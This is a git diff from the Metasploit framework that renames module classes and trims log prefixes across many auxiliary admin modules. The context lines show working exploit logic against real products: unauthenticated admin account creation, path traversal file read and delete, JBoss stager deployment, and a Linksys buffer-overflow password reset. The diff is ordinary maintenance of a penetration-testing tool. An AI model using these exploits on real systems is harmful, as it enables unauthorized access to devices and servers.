a/modules/auxiliary/admin/firetv/firetv_youtube.rb +++ b/modules/auxiliary/admin/firetv/firetv_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index 1c99844b0f..0b1ef1ba24 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index 1941291594..272e9f4d82 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -99,21 +99,21 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Trying to find the service desk service strong name...") + print_status("Trying to find the service desk service strong name...") service_desk = get_service_desk_strong_name if service_desk.nil? - print_error("#{peer} - service desk service not found.") + print_error("service desk service not found.") return end - print_good("#{peer} - service desk strong number found: #{service_desk}") + print_good("service desk strong number found: #{service_desk}") - print_status("#{peer} - Trying to find the AccountService strong name...") + print_status("Trying to find the AccountService strong name...") account_service = get_account_service_strong_name(service_desk) if account_service.nil? - print_error("#{peer} - AccountService service not found.") + print_error("AccountService service not found.") return end - print_good("#{peer} - AccountService strong number found: #{account_service}") + print_good("AccountService strong number found: #{account_service}") header= "6|0|39" # version | unknown | string_table size @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary service_url = ssl ? "https://" : "http://" service_url << "#{rhost}:#{rport}/servicedesk/servicedesk/" - print_status("#{peer} - Trying to create account #{datastore["USERNAME"]}...") + print_status("Trying to create account #{datastore["USERNAME"]}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("servicedesk", "servicedesk", "accountSerivce.gwtsvc"), @@ -247,12 +247,12 @@ class Metasploit3 < Msf::Auxiliary }) unless res and res.code == 200 - print_error("#{peer} - Unknown error while creating the user.") + print_error("Unknown error while creating the user.") return end if res.body =~ /Username.*already exists/ - print_error("#{peer} - The user #{datastore["USERNAME"]} already exists.") + print_error("The user #{datastore["USERNAME"]} already exists.") return elsif res.body =~ /Account.*added successfully/ login_url = ssl ? "https://" : "http://" @@ -267,8 +267,8 @@ class Metasploit3 < Msf::Auxiliary proof: "#{login_url}\n#{res.body}" ) - print_good("#{peer} - Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") - print_status("#{peer} - Use it to log into #{login_url}") + print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") + print_status("Use it to log into #{login_url}") end end diff --git a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb index 55f85637ae..035c3ae179 100644 --- a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb +++ b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 7b4925a4ca..7a08a1366d 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary @traversal.gsub!(/\//, "\\") file.gsub!(/\//, "\\") else # unix - print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows") + print_error("*nix platform detected, vulnerability is only known to work on Windows") return end @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -119,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /View Log Files/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end def get_platform - print_status("#{peer} - Retrieving platform") + print_status("Retrieving platform") res = send_request_cgi( { @@ -140,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 if res.body =~ /Windows/ - print_good("#{peer} - Windows platform found") + print_good("Windows platform found") return 'windows' elsif res.body =~ /Linux/ - print_good("#{peer} - Linux platform found") + print_good("Linux platform found") return 'unix' end end - print_warning("#{peer} - Platform not found, assuming UNIX flavor") + print_warning("Platform not found, assuming UNIX flavor") return 'unix' end diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index 9d89a5b782..29706ecd39 100644 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -8,7 +8,7 @@ require 'bcrypt' require 'digest' require 'openssl' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index 725f125d26..a61bc6e376 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index cc807330d1..c69c44eb88 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index e7e9f7de48..d47959957a 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb index cb17b5cc91..b1870cd699 100644 --- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb index 0fb48eb584..b4f8b16898 100644 --- a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 5a1fcb3cd2..0889e7a690 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index 4601c36955..2cf37c785d 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -77,16 +77,16 @@ class Metasploit3 < Msf::Auxiliary def run if not has_auth - print_error("#{peer} - No basic authentication enabled") + print_error("No basic authentication enabled") return end bypass_string = try_auth if bypass_string.empty? - print_error("#{peer} - The bypass attempt did not work") + print_error("The bypass attempt did not work") else - print_good("#{peer} - You can bypass auth by doing: #{bypass_string}") + print_good("You can bypass auth by doing: #{bypass_string}") end end diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 335c0e050d..18de11b8c8 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -52,17 +52,17 @@ class Metasploit3 < Msf::Auxiliary }) if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) - vprint_status("#{peer} - Boa Version Detected: #{m[1]}") + vprint_status("Boa Version Detected: #{m[1]}") return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Not a Boa Server!") + vprint_status("Not a Boa Server!") return Exploit::CheckCode::Safe # not a boa server end rescue Rex::ConnectionRefused - print_error("#{peer} - Connection refused by server.") + print_error("Connection refused by server.") return Exploit::CheckCode::Safe end end @@ -80,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - The server may be down") + print_error("The server may be down") return elsif res and res.code != 401 - print_status("#{peer} - #{uri} does not have basic authentication enabled") + print_status("#{uri} does not have basic authentication enabled") return end - print_status("#{peer} - Server still operational. Checking to see if password has been overwritten") + print_status("Server still operational. Checking to see if password has been overwritten") res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', @@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Server timedout, will not continue") + print_error("Server timedout, will not continue") return end case res.code when 200 - print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}") + print_good("Password reset successful with admin:#{datastore['PASSWORD']}") when 401 - print_error("#{peer} - Access forbidden. The password reset attempt did not work") + print_error("Access forbidden. The password reset attempt did not work") else - print_status("#{peer} - Unexpected response: Code #{res.code} encountered") + print_status("Unexpected response: Code #{res.code} encountered") end end diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index e3b3932032..1553569111 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb index 63883fbf56..0dfad0849f 100644 --- a/modules/auxiliary/admin/http/jboss_bshdeployer.rb +++ b/modules/auxiliary/admin/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss @@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '') if http_verb == 'POST' - print_status("#{peer} - Deploying payload...") + print_status("Deploying payload...") opts = { :file => "#{app_base}.war", :contents => encoded_payload } else - print_status("#{peer} - Deploying stager...") + print_status("Deploying stager...") stager_name = Rex::Text.rand_text_alpha(8 + rand(8)) stager_contents = stager_jsp(app_base) opts = { @@ -69,37 +69,37 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(bsh_payload) if package.nil? - print_error("#{peer} - Deployment failed") + print_error("Deployment failed") return else - print_good("#{peer} - Deployment successful") + print_good("Deployment successful") end unless http_verb == 'POST' # call the stager to deploy our real payload war stager_uri = '/' + stager_name + '/' + stager_name + '.jsp' payload_data = "#{Rex::Text.rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}" - print_status("#{peer} - Calling stager #{stager_uri} to deploy final payload...") + print_status("Calling stager #{stager_uri} to deploy final payload...") res = deploy('method' => 'POST', 'data' => payload_data, 'uri' => stager_uri) if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Remove the stager - print_status("#{peer} - Removing stager...") + print_status("Removing stager...") files = {} files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp" files[:stager_base] = "#{stager_name}.war" delete_script = generate_bsh(:delete, files) res = deploy_package(delete_script, package) if res.nil? - print_error("#{peer} - Unable to remove Stager") + print_error("Unable to remove Stager") else - print_good("#{peer} - Stager successfully removed") + print_good("Stager successfully removed") end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary def undeploy_action(app_base) # Undeploy the WAR and the stager if needed - print_status("#{peer} - Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") + print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...") files = {} files[:app_base] = "#{app_base}.war" @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Auxiliary package = deploy_bsh(delete_script) if package.nil? - print_error("#{peer} - Unable to remove WAR") + print_error("Unable to remove WAR") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb index 64cbb4fa8b..03f6ee6c75 100644 --- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb +++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss @@ -51,10 +51,10 @@ class Metasploit3 < Msf::Auxiliary stager_contents = stager_jsp_with_payload(app_base, encoded_payload) if http_verb == 'POST' - print_status("#{peer} - Deploying stager for the WAR file...") + print_status("Deploying stager for the WAR file...") res = upload_file(stager_base, stager_jsp_name, stager_contents) else - print_status("#{peer} - Deploying minimal stager to upload the payload...") + print_status("Deploying minimal stager to upload the payload...") head_stager_jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) head_stager_contents = head_stager_jsp(stager_base, stager_jsp_name) head_stager_uri = "/" + stager_base + "/" + head_stager_jsp_name + ".jsp" @@ -79,20 +79,20 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, "Failed to deploy") end - print_status("#{peer} - Calling stager to deploy the payload warfile (might take some time)") + print_status("Calling stager to deploy the payload warfile (might take some time)") stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp' stager_res = deploy('uri' => stager_uri, 'method' => 'GET') if res && res.code == 200 - print_good("#{peer} - Payload deployed") + print_good("Payload deployed") else - print_error("#{peer} - Failed to deploy final payload") + print_error("Failed to deploy final payload") end # Cleaning stagers - print_status("#{peer} - Undeploying stagers via DeploymentFileRepository.remove()...") - print_status("#{peer} - This might take some time, be patient...") if http_verb == "HEAD" + print_status("Undeploying stagers via DeploymentFileRepository.remove()...") + print_status("This might take some time, be patient...") if http_verb == "HEAD" delete_res = [] if head_stager_jsp_name delete_res << delete_file(stager_base + '.war', head_stager_jsp_name, '.jsp') @@ -101,28 +101,28 @@ class Metasploit3 < Msf::Auxiliary delete_res << delete_file('./', stager_base + '.war', '') delete_res.each do |res| if !res - print_warning("#{peer} - Unable to remove WAR [No Response]") + print_warning("Unable to remove WAR [No Response]") elsif (res.code < 200 || res.code >= 300) - print_warning("#{peer} - WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end end end # Undeploy the WAR and the stager if needed def undeploy_action(app_base) - print_status("#{peer} - Undeploying #{app_base} via DeploymentFileRepository.remove()...") + print_status("Undeploying #{app_base} via DeploymentFileRepository.remove()...") print_status("This might take some time, be patient...") if http_verb == "HEAD" res = delete_file('./', app_base + '.war', '') unless res - print_error("#{peer} - Unable to remove WAR (no response)") + print_error("Unable to remove WAR (no response)") return end if res.code < 200 || res.code >= 300 - print_error("#{peer} - Unable to remove WAR [#{res.code} #{res.message}]") + print_error("Unable to remove WAR [#{res.code} #{res.message}]") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/jboss_seam_exec.rb b/modules/auxiliary/admin/http/jboss_seam_exec.rb index e6b097d165..dc8ab507f2 100644 --- a/modules/auxiliary/admin/http/jboss_seam_exec.rb +++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/kaseya_master_admin.rb b/modules/auxiliary/admin/http/kaseya_master_admin.rb index 5703684ca9..27758ccaf5 100644 --- a/modules/auxiliary/admin/http/kaseya_master_admin.rb +++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -53,11 +53,11 @@ class Metasploit3 < Msf::Auxiliary if res && res.body && res.body.to_s =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/ session_val = $1 else - print_error("#{peer} - Failed to get sessionVal") + print_error("Failed to get sessionVal") return end - print_status("#{peer} - Got sessionVal #{session_val}, creating Master Administrator account") + print_status("Got sessionVal #{session_val}, creating Master Administrator account") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'LocalAuth', 'setAccount.aspx'), @@ -73,11 +73,11 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 302 && res.body && res.body.to_s.include?('/vsapres/web20/core/login.asp') - print_error("#{peer} - Master Administrator account creation failed") + print_error("Master Administrator account creation failed") return end - print_good("#{peer} - Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") + print_good("Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb index e442620315..77d4c9095a 100644 --- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/limesurvey_file_download.rb b/modules/auxiliary/admin/http/limesurvey_file_download.rb index a1c019c933..2dc0009268 100644 --- a/modules/auxiliary/admin/http/limesurvey_file_download.rb +++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb @@ -8,7 +8,7 @@ require 'msf/core' # for extracting files require 'zip' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb index 0bae51aafa..e462ad3985 100644 --- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb +++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb index e3acc7bf4b..9aaf2112f8 100644 --- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb +++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -34,20 +34,20 @@ class Metasploit3 < Msf::Auxiliary end def check_login(user) - print_status("#{peer} - Trying to login with #{user} and empty password") + print_status("Trying to login with #{user} and empty password") res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', 'authorization' => basic_auth(user,"") }) if res.nil? || res.code == 404 - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false elsif [200, 301, 302].include?(res.code) - print_good("#{peer} - Successful login #{user} and empty password") + print_good("Successful login #{user} and empty password") return true else - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false end end @@ -56,15 +56,15 @@ class Metasploit3 < Msf::Auxiliary begin if check_login("admin") - print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.") + print_good("login with user admin and no password possible. There is no need to use this module.") return end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end - print_status("#{peer} - Resetting password for the admin user ...") + print_status("Resetting password for the admin user ...") postdata = Rex::Text.rand_text_alpha(246) # Filler postdata << [0x81544AF0].pack("N") # $s0, address of admin password in memory @@ -94,15 +94,15 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 if check_login("admin") - print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password") + print_good("Expected answer and the login was successful. Try to login with the user admin and a blank password") else - print_status("#{peer} - Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") + print_status("Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") end else - print_error("#{peer} - Unexpected answer. Exploit attempt has failed") + print_error("Unexpected answer. Exploit attempt has failed") end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end end diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index c1ad331aae..1ab5cca3ca 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb index 06f5ffceca..520a9b8c79 100644 --- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb +++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary # Yes, "sucess" is really mispelt, as is "Servelet" ... ! unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/ - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end - print_good("#{peer} - Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + print_good("Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/manageengine_dir_listing.rb b/modules/auxiliary/admin/http/manageengine_dir_listing.rb index cf33a28787..6c3f67dcd8 100644 --- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb +++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -182,14 +182,14 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 else cookie = get_cookie end if cookie.nil? - print_error("#{peer} - Failed to get application cookies!") + print_error("Failed to get application cookies!") return end @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Listing directory #{datastore['DIRECTORY']}") + print_status("Listing directory #{datastore['DIRECTORY']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File with directory listing saved in: #{path}") else - print_error("#{peer} - Failed to list directory.") + print_error("Failed to list directory.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_file_download.rb b/modules/auxiliary/admin/http/manageengine_file_download.rb index 49331f2752..a7c393952d 100644 --- a/modules/auxiliary/admin/http/manageengine_file_download.rb +++ b/modules/auxiliary/admin/http/manageengine_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 if cookie.nil? - print_error("#{peer} - Failed to login to IT360!") + print_error("Failed to login to IT360!") return end else @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file 